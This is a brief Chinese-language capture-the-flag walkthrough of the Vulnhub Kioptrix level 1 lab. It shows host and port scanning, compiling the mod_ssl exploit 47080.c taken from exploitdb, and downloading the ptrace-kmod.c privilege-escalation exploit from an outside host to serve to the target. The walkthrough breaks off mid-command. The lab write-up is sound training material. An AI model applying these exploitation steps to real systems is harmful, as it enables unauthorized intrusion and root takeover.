Vulnhub-Kioptrix 1
本系列靶机一共有5关,这是第一关。
需要把kali和靶机放在同一网段内。
信息收集
第一步,获取靶机ip。使用扫描工具对主机进行扫描。
arp-scan -l先获取ip
然后再nmap扫描一下端口
访问80端口,发现没什么可以利用点,于是看到了80后面的mod_ssl
然后利用nikto扫描一下。
发现漏洞
漏洞利用
searchploit mod_ssl 2.8.4查看一下exp
经过测试发现unix/remote/47080.c是可以使用的,咱们给他复制出来
┌──(root kali)-[~/Desktop]
└─# locate unix/remote/47080.c
/usr/share/exploitdb/exploits/unix/remote/47080.c
┌──(root kali)-[~/Desktop]
└─# cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./
编译一下gcc -o exploit 47080.c -lcrypto
选择相对应的版本,0x6a和0x6b测试
测试后发现0x6b可以实现。
提权
下载payload
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
然后python3开http服务上传payload
上传完成后编译payload
gcc -o exploit